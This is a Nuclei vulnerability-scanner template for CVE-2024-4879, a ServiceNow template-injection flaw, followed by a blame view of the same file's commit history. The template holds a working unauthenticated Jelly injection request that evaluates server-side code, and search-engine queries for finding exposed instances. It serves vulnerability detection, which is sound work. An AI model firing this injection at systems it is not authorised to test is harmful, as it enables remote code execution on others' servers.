nuclei-templates/http/cves/2024/CVE-2024-4879.yaml

id: CVE-2024-4879

info:
  name: ServiceNow UI Macros - Template Injection
  author: DhiyaneshDk,ritikchaddha
  severity: unknown
  description: |
    ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
  reference:
    - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293
    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4879
  metadata:
    verified: true
    max-request: 1
    vendor: servicenow
    product: servicenow
    shodan-query:
      - http.favicon.hash:"1701804003"
      - http.title:"servicenow"
    fofa-query:
      - icon_hash=1701804003
      - title="servicenow"
    google-query: intitle:"servicenow"
  tags: cve,cve2024,servicenow,ssti,kev

http:
  - raw:
      - |
        GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<div class="outputmsg_text">1787569</div>'

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 490a00463044022063984d3cbce5745d043c5c9cc387f8053cac782d8047425802957d46af6c4a3502205a4c9c52d6c30c5648035192252a7f7e9bb93fb649b1049b1340060765d10da4:922c64590222798bb761d5b6d8e72950
-												Update and rename http/misconfiguration/servicenow-ssti.yaml to http/cves/2024/CVE-2024-4879.yaml
											
										
										
											2024-07-11 09:47:23 +00:00
+								id: CVE-2024-4879
-												Create servicenow-ssti.yaml
											
										
										
											2024-07-11 06:34:11 +00:00
 								info:
-												lint fix
											
										
										
											2024-07-15 04:39:47 +00:00
+								  name: ServiceNow UI Macros - Template Injection
-												add author name
											
										
										
											2024-07-11 09:49:39 +00:00
+								  author: DhiyaneshDk,ritikchaddha
-												Update CVE-2024-4879.yaml
											
										
										
											2024-07-15 04:37:12 +00:00
+								  severity: unknown
-												Update and rename http/misconfiguration/servicenow-ssti.yaml to http/cves/2024/CVE-2024-4879.yaml
											
										
										
											2024-07-11 09:47:23 +00:00
+								  description: |
 								    ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
-												minor update
											
										
										
											2024-07-11 07:14:32 +00:00
+								  reference:
 								    - https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
-												Update and rename http/misconfiguration/servicenow-ssti.yaml to http/cves/2024/CVE-2024-4879.yaml
											
										
										
											2024-07-11 09:47:23 +00:00
+								    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293
 								    - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1645154
-												Update CVE-2024-4879.yaml
											
										
										
											2024-07-15 04:37:12 +00:00
+								    - https://nvd.nist.gov/vuln/detail/CVE-2024-4879
-												minor update
											
										
										
											2024-07-11 07:14:32 +00:00
+								  metadata:
 								    verified: true
 								    max-request: 1
 								    vendor: servicenow
 								    product: servicenow
 								    shodan-query:
-												Update and rename http/misconfiguration/servicenow-ssti.yaml to http/cves/2024/CVE-2024-4879.yaml
											
										
										
											2024-07-11 09:47:23 +00:00
+								      - http.favicon.hash:"1701804003"
-												minor update
											
										
										
											2024-07-11 07:14:32 +00:00
+								      - http.title:"servicenow"
 								    fofa-query:
 								      - icon_hash=1701804003
 								      - title="servicenow"
 								    google-query: intitle:"servicenow"
-												Update CVE-2024-4879.yaml
											
										
										
											2024-07-30 02:56:59 +00:00
+								  tags: cve,cve2024,servicenow,ssti,kev
-												Create servicenow-ssti.yaml
											
										
										
											2024-07-11 06:34:11 +00:00
 								http:
 								  - raw:
 								      - |
-												Update CVE-2024-4879.yaml
											
										
										
											2024-07-15 04:37:12 +00:00
+								        GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j="jelly"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1
-												Create servicenow-ssti.yaml
											
										
										
											2024-07-11 06:34:11 +00:00
+								        Host: {{Hostname}}
-												fix lint
											
										
										
											2024-07-11 06:34:51 +00:00
-												Create servicenow-ssti.yaml
											
										
										
											2024-07-11 06:34:11 +00:00
+								    matchers-condition: and
 								    matchers:
 								      - type: word
 								        part: body
 								        words:
-												Update CVE-2024-4879.yaml
											
										
										
											2024-07-15 04:37:12 +00:00
+								          - '<div class="outputmsg_text">1787569</div>'
-												minor update
											
										
										
											2024-07-11 07:14:32 +00:00
 								      - type: word
 								        part: header
 								        words:
 								          - 'text/html'
 								      - type: status
 								        status:
 								          - 200
-												Auto Template Signing [Tue Jul 30 07:31:53 UTC 2024] :robot:

											
										
										
											2024-07-30 07:31:53 +00:00
+								# digest: 490a00463044022063984d3cbce5745d043c5c9cc387f8053cac782d8047425802957d46af6c4a3502205a4c9c52d6c30c5648035192252a7f7e9bb93fb649b1049b1340060765d10da4:922c64590222798bb761d5b6d8e72950